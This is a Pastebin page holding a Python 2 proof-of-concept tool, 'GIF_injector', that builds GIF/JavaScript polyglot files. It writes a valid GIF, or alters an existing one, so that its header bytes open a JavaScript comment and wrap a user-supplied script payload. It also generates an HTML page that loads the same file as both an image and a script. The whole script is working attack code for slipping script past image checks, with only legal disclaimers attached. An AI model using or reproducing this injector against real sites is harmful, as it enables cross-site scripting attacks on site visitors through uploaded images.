SHARE
TWEET

GIF_injector

a guest Jan 5th, 2014 14,799 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a GIF. ====================================================#
  4. #======= or it creates a JavaScript Payload as a GIF.    ====================================================#
  5. #======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
  6. #======= Author: marcoramilli.blogspot.com ==================================================================#
  7. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  8. #======= Disclaimer: ========================================================================================#
  9. #THIS IS NOT PEP3 FORMATTED
  10. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  11. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  12. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  13. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  14. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  15. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  16.                                                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  17.                                                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  18. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  19. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  20. #POSSIBILITY OF SUCH DAMAGE.
  21. #===========================================================================================================#
  22. import argparse
  23. import os
  24.  
  25.  
  26. #---------------------------------------------------------
  27. def _hexify(num):
  28.         """
  29.         Converts and formats to hexadecimal
  30.         """
  31.         num = "%x" % num
  32.         if len(num) % 2:
  33.                 num = '0'+num
  34.         return num.decode('hex')
  35.  
  36.  
  37. #---------------------------------------------------------
  38. def _generate_and_write_to_file(payload, fname):
  39.     """
  40.    Generates a fake but valid GIF within scriting
  41.    """
  42.     f = open(fname, "wb")
  43.     header = (b'\x47\x49\x46\x38\x39\x61'  #Signature + Version  GIF89a
  44.                         b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
  45.                         b'\x0A\x00' #Smal Logical Screen Height
  46.                         b'\x00' #GCTF
  47.                         b'\xFF' #BackgroundColor
  48.                         b'\x00' #Pixel Ratio
  49.                         b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
  50.                         b'\x2A\x2F' #Commenting out */
  51.                         b'\x3D\x31\x3B' # enable the script side by introducing =1;
  52.                                         )
  53.     trailer = b'\x3B'
  54.         # I made this explicit, step by step .
  55.     f.write(header)
  56.     f.write(payload)
  57.     f.write(trailer)
  58.     f.close()
  59.     return True
  60.  
  61.  
  62. #---------------------------------------------------------
  63. def _generate_launching_page(f):
  64.         """
  65.         Creates the HTML launching page
  66.         """
  67.         htmlpage ="""
  68.                                                                 <html>
  69.                                                                 <head><title>Opening an image</title> </head>
  70.                                                                 <body>
  71.                                                                         <img src=\"""" + f + """_malw.gif\"\>
  72.                                                                         <script src= \"""" + f + """_malw.gif\"> </script>
  73.                                                                 </body>
  74.                                                                 </html>
  75.                           """
  76.         html = open("run.html", "wb")
  77.         html.write(htmlpage);
  78.         html.close()
  79.         return True
  80.  
  81.  
  82. #---------------------------------------------------------
  83. def _inject_into_file(payload, fname):
  84.         """
  85.         Injects the payload into existing GIF
  86.         NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues
  87.         """
  88.         # I know, I can do it all in memory and much more fast.
  89.         # I wont do it here.
  90.         with open(fname + "_malw.gif", "w+b") as fout:
  91.                 with open(fname, "rt") as fin:
  92.                         for line in fin:
  93.                                 ls1 = line.replace(b'\x2A\x2F', b'\x00\x00')
  94.                                 ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00')                            
  95.                                 fout.write(ls2)                
  96.                 fout.seek(6,0)
  97.                 fout.write(b'\x2F\x2A') #/*
  98.  
  99.         f = open(fname + "_malw.gif", "a+b") #appending mode
  100.         f.write(b'\x2A\x2F\x3D\x31\x3B')
  101.         f.write(payload)
  102.         f.write(b'\x3B')
  103.         f.close()
  104.         return True
  105.  
  106.  
  107. #---------------------------------------------------------
  108. if __name__ == "__main__":
  109.         parser = argparse.ArgumentParser()
  110.         parser.add_argument("filename",help="the gif file name to be generated/or infected")
  111.         parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
  112.         parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
  113.         args = parser.parse_args()
  114.         print("""
  115.                                         |======================================================================================================|
  116.                                         | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
  117.                                         | It is the end user's responsibility to obey all applicable local, state and federal laws.            |
  118.                                         | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
  119.                                         |======================================================================================================|
  120.                                         """
  121.          )
  122.         if args.inject_to_existing_gif:
  123.                  _inject_into_file(args.js_payload, args.filename)
  124.         else:
  125.                 _generate_and_write_to_file(args.js_payload, args.filename)
  126.  
  127.         _generate_launching_page(args.filename)
  128.         print "[+] Finished!"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top